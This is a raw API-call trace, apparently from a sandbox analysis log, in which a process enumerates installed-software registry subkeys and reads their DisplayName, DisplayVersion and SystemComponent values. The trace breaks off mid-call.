0x0 [0030.181] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.181] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x0, lpcbData=0xe21700*=0x4) returned 0x2 [0030.181] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.181] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.181] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x0, lpcbData=0xe21700*=0x80) returned 0x2 [0030.181] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.181] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x12, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.181] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.181] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.181] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.181] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.181] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x0, lpcbData=0xe21700*=0x4) returned 0x2 [0030.181] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.181] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.181] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x0, lpcbData=0xe21700*=0x80) returned 0x2 [0030.181] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.181] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x13, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.181] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.181] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.181] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.181] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.181] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x0, lpcbData=0xe21700*=0x4) returned 0x2 [0030.181] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.181] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.181] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x0, lpcbData=0xe21700*=0x80) returned 0x2 [0030.181] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.182] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x14, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.182] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.182] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.182] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.182] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.182] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x0, lpcbData=0xe21700*=0x4) returned 0x2 [0030.182] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.182] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.182] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x0, lpcbData=0xe21700*=0x80) returned 0x2 [0030.182] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.182] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x15, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.182] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.182] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.182] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.182] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.182] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x0, lpcbData=0xe21700*=0x4) returned 0x2 [0030.182] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.182] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.182] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x0, lpcbData=0xe21700*=0x80) returned 0x2 [0030.182] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.182] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x16, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.182] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.182] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.182] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.182] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.182] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x0, lpcbData=0xe21700*=0x4) returned 0x2 [0030.182] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.183] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.183] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x0, lpcbData=0xe21700*=0x80) returned 0x2 [0030.183] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.183] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x17, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{26A24AE4-039D-4CA4-87B4-2F03217071FF}", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.183] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{26A24AE4-039D-4CA4-87B4-2F03217071FF}", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.183] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.183] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.183] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{26A24AE4-039D-4CA4-87B4-2F03217071FF}", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.183] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x0, lpcbData=0xe21700*=0x4) returned 0x2 [0030.183] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.183] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{26A24AE4-039D-4CA4-87B4-2F03217071FF}", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.183] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x4a, lpcbData=0xe21700*=0x11) returned 0x0 [0030.183] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.183] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{26A24AE4-039D-4CA4-87B4-2F03217071FF}", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.183] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x37, lpcbData=0xe21700*=0x8) returned 0x0 [0030.183] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.183] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x18, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.183] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.183] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.183] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.183] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.183] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x0, lpcbData=0xe21700*=0x4) returned 0x2 [0030.183] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.183] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.184] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x4d, lpcbData=0xe21700*=0x3d) returned 0x0 [0030.184] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.184] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.184] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x31, lpcbData=0xe21700*=0xd) returned 0x0 [0030.184] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.184] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x19, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{3c3aafc8-d898-43ec-998f-965ffdae065a}", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.184] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{3c3aafc8-d898-43ec-998f-965ffdae065a}", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.184] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.184] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.184] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{3c3aafc8-d898-43ec-998f-965ffdae065a}", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.184] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x0, lpcbData=0xe21700*=0x4) returned 0x2 [0030.184] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.184] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{3c3aafc8-d898-43ec-998f-965ffdae065a}", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.184] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x4d, lpcbData=0xe21700*=0x3d) returned 0x0 [0030.184] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.184] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{3c3aafc8-d898-43ec-998f-965ffdae065a}", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.184] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x31, lpcbData=0xe21700*=0xd) returned 0x0 [0030.184] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.184] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x1a, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{4A03706F-666A-4037-7777-5F2748764D10}", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.184] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{4A03706F-666A-4037-7777-5F2748764D10}", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.184] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.184] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.185] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{4A03706F-666A-4037-7777-5F2748764D10}", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.185] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x1, lpcbData=0xe21700*=0x4) returned 0x0 [0030.185] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.185] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x1b, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{582EA838-9199-3518-A05C-DB09462F68EC}", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.185] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{582EA838-9199-3518-A05C-DB09462F68EC}", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.185] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.185] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.185] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{582EA838-9199-3518-A05C-DB09462F68EC}", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.185] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x1, lpcbData=0xe21700*=0x4) returned 0x0 [0030.185] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.185] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x1c, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{68306422-7C57-373F-8860-D26CE4BA2A15}", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.185] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{68306422-7C57-373F-8860-D26CE4BA2A15}", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.185] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.185] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.185] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{68306422-7C57-373F-8860-D26CE4BA2A15}", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.185] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x1, lpcbData=0xe21700*=0x4) returned 0x0 [0030.185] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.185] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x1d, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.185] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.185] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.185] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.185] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.185] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x0, lpcbData=0xe21700*=0x4) returned 0x2 [0030.185] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.185] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.185] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x4d, lpcbData=0xe21700*=0x2a) returned 0x0 [0030.186] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.186] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.186] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x38, lpcbData=0xe21700*=0xa) returned 0x0 [0030.186] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.186] RegEnumKeyExA (in: hKey=0x1a4, dwIndex=0x1e, lpName=0xe2185c, lpcchName=0xe21744, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{9BE518E6-ECC6-35A9-88E4-87755C07200F}", lpcchName=0xe21744, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0030.186] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{9BE518E6-ECC6-35A9-88E4-87755C07200F}", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.186] RegQueryValueExA (in: hKey=0x1a8, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0xe21700*=0x0) returned 0x2 [0030.186] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.186] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{9BE518E6-ECC6-35A9-88E4-87755C07200F}", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.186] RegQueryValueExA (in: hKey=0x1a8, lpValueName="SystemComponent", lpReserved=0x0, lpType=0x0, lpData=0xe2172c, lpcbData=0xe21700*=0x4 | out: lpType=0x0, lpData=0xe2172c*=0x0, lpcbData=0xe21700*=0x4) returned 0x2 [0030.186] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.186] RegOpenKeyExA (in: hKey=0x1a4, lpSubKey="{9BE518E6-ECC6-35A9-88E4-87755C07200F}", ulOptions=0x0, samDesired=0x20019, phkResult=0xe216f4 | out: phkResult=0xe216f4*=0x1a8) returned 0x0 [0030.186] RegQueryValueExA (in: hKey=0x1a8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0xe2175c, lpcbData=0xe21700*=0x80 | out: lpType=0x0, lpData=0xe2175c*=0x4d, lpcbData=0xe21700*=0x3f) returned 0x0 [0030.186] RegCloseKey (hKey=0x1a8) returned 0x0 [0030.186] RegOpenKeyExA (in: 